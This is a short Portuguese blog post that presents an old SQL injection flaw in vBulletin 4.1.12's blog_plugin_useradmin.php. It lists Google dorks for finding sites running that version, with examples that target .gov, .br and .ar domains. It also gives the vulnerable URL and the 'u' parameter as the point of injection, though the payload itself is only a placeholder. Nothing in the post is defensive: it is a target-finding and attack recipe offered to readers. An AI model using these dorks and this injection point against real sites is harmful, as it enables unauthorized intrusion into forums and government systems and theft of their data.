Um bug no Vbulletin (blog_plugin_useradmin) v4.1.12 que aquele velhoooo sql injection.
Aé vai o dork né!
Dork: site:domínio intext:"Powered By Vbulletin 4.1.12"
Ex:
site:ar intext:"Powered By Vbulletin 4.1.12"
site:br intext:"Powered By Vbulletin 4.1.12"
site:gov intext:"Powered By Vbulletin 4.1.12"
O domínio fica a sua preferencia.
Uso do exploit
http://site/includes/blog_plugin_useradmin.php?do=usercss&u="SQL INJECTION"
Este comentário foi removido por um administrador do blog.
ResponderExcluirEste comentário foi removido por um administrador do blog.
ResponderExcluir